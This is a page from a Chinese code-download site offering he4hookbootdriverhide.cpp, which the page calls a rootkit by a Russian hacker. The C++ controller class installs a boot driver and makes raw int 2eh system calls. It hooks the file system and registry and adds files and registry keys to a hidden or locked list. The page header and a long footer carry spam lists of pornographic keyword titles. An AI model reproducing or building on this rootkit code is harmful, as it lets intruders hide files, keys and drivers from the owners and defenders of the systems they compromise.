亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? he4hookbootdriverhide.cpp

?? 爾羅斯著名黑客寫的rootkit
?? CPP
字號:
#define STRICT
#include "He4HookBootDriverHide.hpp"

He4HookBootDriverHide::He4HookBootDriverHide(const WCHAR *lpszDeviceFileName) : 
                       NtBootDriverControlHide(lpszDeviceFileName)
{
  if (!NtBootDriverControlHide::Result)
    return;

  Result = TRUE;
}

He4HookBootDriverHide::~He4HookBootDriverHide()
{
}

DWORD He4HookBootDriverHide::ZwDispatchFunction(DWORD dwProcessId, DWORD dwThreadId, DWORD IoControlCode,
                                                PVOID InputBuffer, DWORD InputBufferLength,
                                                PVOID OutputBuffer, DWORD OutputBufferLength, 
                                                DWORD *lpBytesReturned)
{
  void   **lpParameterStack = (void**) &dwProcessId;
  DWORD    dwRet = -1;
  DWORD    dwSericeId = (KE_SERVICE_TABLE_INDEX<<12) + 2;

  __asm
  {
    mov  eax, [dwSericeId]     
    mov  edx, lpParameterStack
    int  2eh
    mov  [dwRet], eax
  }

  return dwRet;
}

BOOLEAN He4HookBootDriverHide::SendCommand(USER_COMMAND *lpUserCommand)
{
  if (!lpUserCommand)
    return FALSE;

  __try
  {
    DWORD NtStatus = ZwDispatchFunction(0, 0,
                                        lpUserCommand->m_dwCommand,
                                        lpUserCommand->m_lpInBuffer, lpUserCommand->m_dwInBufferSize,
                                        lpUserCommand->m_lpOutBuffer, lpUserCommand->m_dwOutBufferSize,
                                        &lpUserCommand->m_dwBytesReturned);
    if (NtStatus)
    {
      return FALSE;
    }
  }
  __except(EXCEPTION_EXECUTE_HANDLER)
  {
    return FALSE;
  }
  return TRUE;
}

DWORD He4HookBootDriverHide::GetVersion()
{
  USER_COMMAND UserCommand;
  DWORD        dwVer = 0;

  UserCommand.m_dwCommand = HE4_DEVICE_VERSION;
  UserCommand.m_lpOutBuffer = &dwVer;
  UserCommand.m_dwOutBufferSize = sizeof(DWORD);

  if (!SendCommand(&UserCommand))
    return 0;
  return dwVer;
}

BOOLEAN He4HookBootDriverHide::HookFileSystem(DWORD dwHook)
{
  USER_COMMAND  UserCommand;
  DWORD         dwHookResult = 0x0;


  UserCommand.m_dwCommand = HE4_HOOK_FILE_SYSTEM;
  UserCommand.m_lpInBuffer = &dwHook;
  UserCommand.m_dwInBufferSize = sizeof(DWORD);
  UserCommand.m_lpOutBuffer = &dwHookResult;
  UserCommand.m_dwOutBufferSize = sizeof(DWORD);

  if (!SendCommand(&UserCommand))
    return FALSE;
  return (BOOLEAN) UserCommand.m_dwBytesReturned;
}

BOOLEAN He4HookBootDriverHide::LockSaveFiles()
{
  USER_COMMAND    UserCommand;

  UserCommand.m_dwCommand = HE4_LOCK_SAVE_FILES;
  UserCommand.m_lpInBuffer = NULL;
  UserCommand.m_dwInBufferSize = 0;
  UserCommand.m_lpOutBuffer = NULL;
  UserCommand.m_dwOutBufferSize = 0;
  UserCommand.m_dwBytesReturned = 0;
  if(!SendCommand(&UserCommand)) 
     return FALSE;
  return (BOOLEAN) UserCommand.m_dwBytesReturned;
}

BOOLEAN He4HookBootDriverHide::UnLockSaveFiles(DWORD dwUnlockFlags)
{
  USER_COMMAND         UserCommand;
  HE4_UNLOCK_SETTING   UnlockSetting;

  UnlockSetting.m_dwUnlockFlags = dwUnlockFlags;

  UserCommand.m_dwCommand = HE4_UNLOCK_SAVE_FILES;
  UserCommand.m_lpInBuffer = &UnlockSetting;
  UserCommand.m_dwInBufferSize = sizeof(HE4_UNLOCK_SETTING);
  UserCommand.m_lpOutBuffer = NULL;
  UserCommand.m_dwOutBufferSize = 0;
  UserCommand.m_dwBytesReturned = 0;
  if (!SendCommand(&UserCommand)) 
    return FALSE;
  return (BOOLEAN) UserCommand.m_dwBytesReturned;
}

BOOLEAN He4HookBootDriverHide::AddToSaveList(PW32_FILEINFOSET lpFileInfoSetW32)
{
  USER_COMMAND    UserCommand;

  PFILEINFOSET lpFileInfoSet = CreateFileInfoSet(lpFileInfoSetW32);
  if (lpFileInfoSet)
  {
    UserCommand.m_dwCommand = HE4_ADD_TO_SAVE_LIST;
    UserCommand.m_lpInBuffer = lpFileInfoSet;
    UserCommand.m_dwInBufferSize = lpFileInfoSet->dwSize;
    UserCommand.m_dwBytesReturned = 0;
    if (SendCommand(&UserCommand)) 
    {
      delete[] (char*)lpFileInfoSet;
      return (BOOLEAN) UserCommand.m_dwBytesReturned;
    }
    delete[] (char*)lpFileInfoSet;
  }
  
  return FALSE;
}

BOOLEAN He4HookBootDriverHide::DelFromSaveList(PW32_FILEINFOSET lpFileInfoSetW32)
{
  USER_COMMAND    UserCommand;

  PFILEINFOSET lpFileInfoSet = CreateFileInfoSet(lpFileInfoSetW32);

  if (lpFileInfoSet)
  {
    UserCommand.m_dwCommand = HE4_DEL_FROM_SAVE_LIST;
    UserCommand.m_lpInBuffer = lpFileInfoSet;
    UserCommand.m_dwInBufferSize = lpFileInfoSet->dwSize;
    UserCommand.m_dwBytesReturned = 0;
    if (SendCommand(&UserCommand)) 
    { 
      delete[] (char*)lpFileInfoSet;
      return (BOOLEAN) UserCommand.m_dwBytesReturned;
    }
    delete[] (char*)lpFileInfoSet;
  }
  return FALSE;
}

DWORD He4HookBootDriverHide::QueryUnload()
{
  USER_COMMAND    UserCommand;

  UserCommand.m_dwCommand = HE4_QUERY_UNLOAD;
  UserCommand.m_lpInBuffer = NULL;
  UserCommand.m_dwInBufferSize = 0;
  UserCommand.m_dwBytesReturned = 0;
  if (!SendCommand(&UserCommand)) 
    return (DWORD)-1;
  return UserCommand.m_dwBytesReturned;
}

BOOLEAN He4HookBootDriverHide::AddKeysToSaveList(PW32_KEYINFOSET lpKeyInfoSetW32)
{
  USER_COMMAND    UserCommand;

  PKEYINFOSET lpKeyInfoSet = CreateKeyInfoSet(lpKeyInfoSetW32);

  if (lpKeyInfoSet)
  {
    UserCommand.m_dwCommand = HE4_ADD_KEYS_TO_SAVE_LIST;
    UserCommand.m_lpInBuffer = lpKeyInfoSet;
    UserCommand.m_dwInBufferSize = lpKeyInfoSet->dwSize;
    UserCommand.m_dwBytesReturned = 0;
    if (SendCommand(&UserCommand)) 
    {
      delete[] (char*)lpKeyInfoSet;
      return (BOOLEAN) UserCommand.m_dwBytesReturned;
    }
    delete[] (char*)lpKeyInfoSet;
  }
  return FALSE;
}

BOOLEAN He4HookBootDriverHide::DelKeysFromSaveList(PW32_KEYINFOSET lpKeyInfoSetW32)
{
  USER_COMMAND    UserCommand;

  PKEYINFOSET lpKeyInfoSet = CreateKeyInfoSet(lpKeyInfoSetW32);

  if (lpKeyInfoSet)
  {
    UserCommand.m_dwCommand = HE4_DEL_KEYS_FROM_SAVE_LIST;
    UserCommand.m_lpInBuffer = lpKeyInfoSet;
    UserCommand.m_dwInBufferSize = lpKeyInfoSet->dwSize;
    UserCommand.m_dwBytesReturned = 0;
    if (SendCommand(&UserCommand)) 
    {
      delete[] (char*)lpKeyInfoSet;
      return (BOOLEAN) UserCommand.m_dwBytesReturned;
    }
    delete[] (char*)lpKeyInfoSet;
  }

  return FALSE;
}

BOOLEAN He4HookBootDriverHide::HookRegistry()
{
  USER_COMMAND    UserCommand;

  UserCommand.m_dwCommand = HE4_HOOK_REGISTRY;
  UserCommand.m_lpInBuffer = NULL;
  UserCommand.m_dwInBufferSize = 0;
  UserCommand.m_lpOutBuffer = NULL;
  UserCommand.m_dwOutBufferSize = 0;
  UserCommand.m_dwBytesReturned = 0;
  if (!SendCommand(&UserCommand)) 
    return FALSE;
  return (BOOLEAN) UserCommand.m_dwBytesReturned;
}

BOOLEAN He4HookBootDriverHide::UnHookRegistry()
{
  USER_COMMAND    UserCommand;

  UserCommand.m_dwCommand = HE4_UNHOOK_REGISTRY;
  UserCommand.m_lpInBuffer = NULL;
  UserCommand.m_dwInBufferSize = 0;
  UserCommand.m_lpOutBuffer = NULL;
  UserCommand.m_dwOutBufferSize = 0;
  UserCommand.m_dwBytesReturned = 0;
  if (!SendCommand(&UserCommand)) 
    return FALSE;
  return (BOOLEAN) UserCommand.m_dwBytesReturned;
}

DWORD He4HookBootDriverHide::NativeGetVersion(DWORD *lpdwVersion)
{
  void **lpParameterStack = (void **) &lpdwVersion;
  DWORD  dwRet = -1;
  DWORD  dwSericeId = (KE_SERVICE_TABLE_INDEX<<12) + 0;

  __asm
  {
    mov  eax, [dwSericeId]     
    mov  edx, lpParameterStack
    int  2eh
    mov  [dwRet], eax
  }

  return dwRet;
}

BOOLEAN He4HookBootDriverHide::Install()
{
  DWORD   dwVer = 0;
  BOOLEAN bRes;
  WCHAR   wszDeviceName[64];
  DWORD   NtStatus = NativeGetVersion(&dwVer);

  if (NT_SUCCESS(NtStatus) && dwVer == HE4_HOOK_INV_VERSION) 
    return TRUE;
  if (NT_SUCCESS(NtStatus))
    return FALSE;

  swprintf(wszDeviceName, L"%08X", (ULONG)NtCurrentTeb());
  bRes = NtBootDriverControlHide::Install(wszDeviceName);
  bRes &= Start(wszDeviceName);
  Stop(wszDeviceName);
  Remove(wszDeviceName);

  return bRes;
}


PFILEINFOSET He4HookBootDriverHide::CreateFileInfoSet(PW32_FILEINFOSET lpFileInfoSetW32)
{
  if (!lpFileInfoSetW32)
    return FALSE;

  DWORD dwSizeOfArea = SIZEOF_FILEINFOSET - SIZEOF_FILEINFO;

  for (int i=0; i<(int)lpFileInfoSetW32->dwSize; i++)
  {
    if (lpFileInfoSetW32->lpFileInfo[i].lpszName)
    {
      dwSizeOfArea += SIZEOF_FILEINFO - sizeof(char);
      dwSizeOfArea += strlen(lpFileInfoSetW32->lpFileInfo[i].lpszName) + sizeof(char);
      if (lpFileInfoSetW32->lpFileInfo[i].dwAccessType & FILE_ACC_TYPE_EXCHANGE)
      {
        if (!lpFileInfoSetW32->lpFileInfo[i].lpszChangedName)
        {
          lpFileInfoSetW32->lpFileInfo[i].dwAccessType &= ~FILE_ACC_TYPE_EXCHANGE;
        }
        else
        {
          dwSizeOfArea += strlen(lpFileInfoSetW32->lpFileInfo[i].lpszChangedName) + sizeof(char);
        }
      }
      else
      {
        lpFileInfoSetW32->lpFileInfo[i].lpszChangedName = NULL;
      }
    }
  }

  PFILEINFOSET pFileInfoSet = NULL;
  if (dwSizeOfArea > SIZEOF_FILEINFOSET - SIZEOF_FILEINFO)
  {
    pFileInfoSet = (PFILEINFOSET) new char[dwSizeOfArea];
    if (pFileInfoSet)
    {
      memset(pFileInfoSet, 0, dwSizeOfArea);
      pFileInfoSet->dwSize = dwSizeOfArea;
      PFILEINFO pFileInfo = &pFileInfoSet->FileInfo[0];
      DWORD     dwSizeNames;
      for (int i=0; i<(int)lpFileInfoSetW32->dwSize; i++)
      {
        if (lpFileInfoSetW32->lpFileInfo[i].lpszName)
        {
          pFileInfo->dwAccessType = lpFileInfoSetW32->lpFileInfo[i].dwAccessType;

          dwSizeNames = strlen(lpFileInfoSetW32->lpFileInfo[i].lpszName)+sizeof(char);
          if (lpFileInfoSetW32->lpFileInfo[i].lpszChangedName)
            dwSizeNames += strlen(lpFileInfoSetW32->lpFileInfo[i].lpszChangedName)+sizeof(char);

          pFileInfo->dwSizeAllNamesArea = dwSizeNames;

          pFileInfo->dwOffsetToAnsiName = 0;
          pFileInfo->dwSizeAnsiName = strlen(lpFileInfoSetW32->lpFileInfo[i].lpszName)+sizeof(char);

          strcpy(pFileInfo->szNames+pFileInfo->dwOffsetToAnsiName, lpFileInfoSetW32->lpFileInfo[i].lpszName);

          if (lpFileInfoSetW32->lpFileInfo[i].lpszChangedName)
          {
            pFileInfo->dwOffsetToAnsiChangedName = pFileInfo->dwOffsetToAnsiName + pFileInfo->dwSizeAnsiName;
            pFileInfo->dwSizeAnsiChangedName = strlen(lpFileInfoSetW32->lpFileInfo[i].lpszChangedName)+sizeof(char);
            strcpy(pFileInfo->szNames+pFileInfo->dwOffsetToAnsiChangedName, lpFileInfoSetW32->lpFileInfo[i].lpszChangedName);
          }

          pFileInfo = (PFILEINFO) ((PCHAR)pFileInfo + dwSizeNames + (SIZEOF_FILEINFO-sizeof(char)));
        }
      }
    }
  }

  return pFileInfoSet;
}

PKEYINFOSET He4HookBootDriverHide::CreateKeyInfoSet(PW32_KEYINFOSET lpKeyInfoSetW32)
{
  if (!lpKeyInfoSetW32)
    return FALSE;

  DWORD dwSizeOfArea = SIZEOF_KEYINFOSET - SIZEOF_KEYINFO;

  for (int i=0; i<(int)lpKeyInfoSetW32->dwSize; i++)
  {
    if (lpKeyInfoSetW32->lpKeyInfo[i].lpszName)
    {
      dwSizeOfArea += SIZEOF_KEYINFO - sizeof(char);
      dwSizeOfArea += strlen(lpKeyInfoSetW32->lpKeyInfo[i].lpszName) + sizeof(char);
    }
  }

  PKEYINFOSET pKeyInfoSet = NULL;
  if (dwSizeOfArea > SIZEOF_KEYINFOSET - SIZEOF_KEYINFO)
  {
    pKeyInfoSet = (PKEYINFOSET ) new char[dwSizeOfArea];
    if (pKeyInfoSet)
    {
      memset(pKeyInfoSet, 0, dwSizeOfArea);
      pKeyInfoSet->dwSize = dwSizeOfArea;
      PKEYINFO pKeyInfo = &pKeyInfoSet->KeyInfo[0];
      DWORD     dwSizeNames;
      for (int i=0; i<(int)lpKeyInfoSetW32->dwSize; i++)
      {
        if (lpKeyInfoSetW32->lpKeyInfo[i].lpszName)
        {
          pKeyInfo->dwType = lpKeyInfoSetW32->lpKeyInfo[i].dwType;

          dwSizeNames = strlen(lpKeyInfoSetW32->lpKeyInfo[i].lpszName)+sizeof(char);

          pKeyInfo->dwSizeName = dwSizeNames;

          strcpy(pKeyInfo->szName, lpKeyInfoSetW32->lpKeyInfo[i].lpszName);

          pKeyInfo = (PKEYINFO) ((PCHAR)pKeyInfo + dwSizeNames + (SIZEOF_KEYINFO-sizeof(char)));
        }
      }
    }
  }

  return pKeyInfoSet;
}

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美不卡一区二区三区| 日韩无一区二区| 99视频一区二区| 国产麻豆91精品| 国产在线一区二区综合免费视频| 蜜臀久久久久久久| 日韩激情av在线| 日本麻豆一区二区三区视频| 久久不见久久见免费视频7 | 9人人澡人人爽人人精品| 国产一区二区伦理| 粉嫩蜜臀av国产精品网站| 成人白浆超碰人人人人| 成人久久18免费网站麻豆 | 成人av在线影院| 懂色av一区二区三区免费观看| 国产999精品久久久久久绿帽| 成人午夜又粗又硬又大| 91福利在线看| 欧美一区二区三区的| 精品成人一区二区| 国产精品人成在线观看免费| 亚洲三级久久久| 亚洲va国产va欧美va观看| 国产一区二区三区香蕉| 91视视频在线观看入口直接观看www | 日韩免费成人网| 国产日韩亚洲欧美综合| 一区二区三区四区亚洲| 久久精品国产精品亚洲红杏| 成人app在线| 欧美日韩你懂的| 久久噜噜亚洲综合| 一区二区三区在线观看视频| 久久精品国产精品亚洲综合| 色菇凉天天综合网| 久久影院视频免费| 亚洲伊人色欲综合网| 国产毛片精品国产一区二区三区| 91麻豆国产精品久久| 精品日韩欧美在线| 亚洲一区在线观看免费| 成人涩涩免费视频| 日韩一区二区不卡| 亚洲乱码一区二区三区在线观看| 裸体一区二区三区| 一本色道久久综合亚洲91| 久久久99免费| 免费在线看成人av| 91黄色免费看| 国产精品久久久久精k8| 精品亚洲国内自在自线福利| 欧洲精品中文字幕| 国产精品网友自拍| 国产一区二区三区黄视频| 欧美日韩成人高清| 伊人夜夜躁av伊人久久| 国产+成+人+亚洲欧洲自线| 欧美一级夜夜爽| 亚洲成人一区在线| 欧美亚洲日本国产| 亚洲精品综合在线| jvid福利写真一区二区三区| 国产调教视频一区| 韩国成人精品a∨在线观看| 欧美一区二区在线免费观看| 亚洲狠狠爱一区二区三区| 99视频国产精品| 国产三级三级三级精品8ⅰ区| 精品一区二区三区欧美| 欧美成人vps| 日韩精品1区2区3区| 欧美久久婷婷综合色| 亚洲一区二区五区| 欧日韩精品视频| 亚洲国产视频一区二区| 欧美色中文字幕| 五月天久久比比资源色| 欧美日韩国产色站一区二区三区| 亚洲国产婷婷综合在线精品| 在线电影欧美成精品| 日韩有码一区二区三区| 欧美成人一区二区三区 | 久久久亚洲精品石原莉奈| 激情伊人五月天久久综合| 精品国产a毛片| 国产成人a级片| 国产精品久久久久久久久图文区 | 亚洲欧美日韩国产综合在线| 97se亚洲国产综合自在线不卡 | 久久综合九色综合欧美亚洲| 精品亚洲成a人| 国产精品乱码一区二三区小蝌蚪| 91在线视频免费观看| 亚洲国产aⅴ天堂久久| 欧美一二三四在线| 国产成人a级片| 一区二区三区精密机械公司| 91精品国产综合久久婷婷香蕉| 免费久久精品视频| 中文av字幕一区| 色噜噜狠狠一区二区三区果冻| 亚洲一区二区三区中文字幕 | 久久精品人人做人人综合 | 久久电影网站中文字幕| 久久久99精品免费观看不卡| 91福利社在线观看| 久久99精品久久久久久久久久久久| 国产欧美日韩久久| 欧美日韩大陆一区二区| 成人中文字幕合集| 亚洲成人中文在线| 国产欧美日韩麻豆91| 5566中文字幕一区二区电影| 成人性色生活片免费看爆迷你毛片| 天使萌一区二区三区免费观看| 国产欧美精品区一区二区三区| 欧美日韩精品一区二区天天拍小说| 国产精品自产自拍| 午夜精品一区二区三区电影天堂 | 亚洲国产欧美另类丝袜| 久久蜜桃av一区二区天堂| 欧美日韩色综合| 99精品国产91久久久久久| 久久国产精品第一页| 午夜精品在线视频一区| 亚洲视频网在线直播| 国产日韩欧美制服另类| 3atv在线一区二区三区| 日本道在线观看一区二区| 国产一区二区视频在线| 日韩国产欧美在线视频| 亚洲精选视频免费看| 国产精品不卡视频| 欧美精品一区二区三区蜜桃视频 | 亚洲福利一区二区三区| 国产精品理伦片| 国产欧美一区二区三区在线看蜜臀 | www.亚洲在线| 国产精品一级片在线观看| 久久精品国产999大香线蕉| 亚洲成人tv网| 亚洲精品国产精品乱码不99| ㊣最新国产の精品bt伙计久久| 久久你懂得1024| 久久综合久久久久88| 精品99一区二区| 精品久久久久久亚洲综合网| 欧美一区二区三区免费视频| 欧美男女性生活在线直播观看| 在线看一区二区| 色婷婷精品大在线视频 | 欧美一区二区三区白人| 欧美人妇做爰xxxⅹ性高电影 | 国产成人免费视频网站高清观看视频| 久久精品国产免费| 国产麻豆午夜三级精品| 国产成人av影院| 成人网在线播放| av电影一区二区| 色成人在线视频| 欧美日韩夫妻久久| 欧美电视剧免费观看| 久久麻豆一区二区| 国产精品美日韩| 亚洲欧美激情一区二区| 亚洲成人午夜电影| 精品一二三四区| 不卡在线观看av| 欧美日韩一区二区三区四区| 精品国产一区二区三区av性色| 久久综合av免费| 中文字幕一区在线观看视频| 亚洲一区二区三区四区在线观看| 午夜精品成人在线| 国产资源在线一区| 99国产精品久久久久| 欧美日韩国产影片| 欧美精品一区二区三区久久久| 国产精品久久久久精k8| 亚洲精品成人在线| 青青草国产精品97视觉盛宴| 国产一区二区福利| 国产999精品久久久久久| 欧美三级韩国三级日本三斤| 欧美精品一区二区三区蜜桃| 亚洲欧洲日韩av| 另类中文字幕网| 99九九99九九九视频精品| 在线播放中文一区| 337p粉嫩大胆噜噜噜噜噜91av | 4438亚洲最大| 国产蜜臀97一区二区三区| 亚洲国产精品影院| 国产成人aaa| 日韩免费视频一区二区| 中文字幕在线观看不卡| 蜜臀久久久99精品久久久久久| 99在线热播精品免费| 精品久久久三级丝袜|